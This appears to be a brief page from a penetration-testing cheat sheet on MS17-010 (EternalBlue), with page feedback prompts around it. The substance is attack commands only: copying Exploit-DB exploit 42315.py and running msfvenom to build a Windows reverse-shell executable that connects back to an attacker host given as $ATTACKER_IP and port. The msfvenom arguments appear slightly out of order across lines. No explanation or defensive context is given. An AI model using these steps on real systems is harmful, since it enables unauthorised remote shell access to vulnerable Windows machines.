MS17-010
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
cp /usr/share/exploitdb/exploits/windows/remote/42315.py .
msfvenom -p windows/shell_reverse_tcp -f exe \
-o reverse.exe
LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT